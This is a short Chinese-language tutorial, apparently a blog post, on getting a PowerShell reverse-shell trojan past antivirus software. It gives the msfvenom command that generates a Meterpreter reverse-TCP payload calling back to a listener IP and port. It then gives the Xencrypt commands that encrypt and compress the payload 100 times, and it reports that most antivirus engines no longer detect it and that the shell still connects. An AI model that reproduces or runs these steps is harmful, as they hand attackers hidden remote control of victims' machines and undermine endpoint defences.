结合"PowerShell crypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软
1、msfvenom生成powershell 反弹马
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= 192.168.81.253 LPORT=5555 -f psh-reflection > hackshark.ps1
image.png
通过检测,发现依然有很多家杀软报毒
image.png
2、采用"crypter"加密、压缩处理ps反弹木马
在powershell终端中输入
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile .\hackshark.ps1 -OutFile hackhack.ps1 -Iterations 100
"-Iterations 100"是对脚本进行100次的加密与压缩
经过100加密、压缩后
image.png
已经实现大部分免杀了
image.png
也能成功反弹:
image.png
网友评论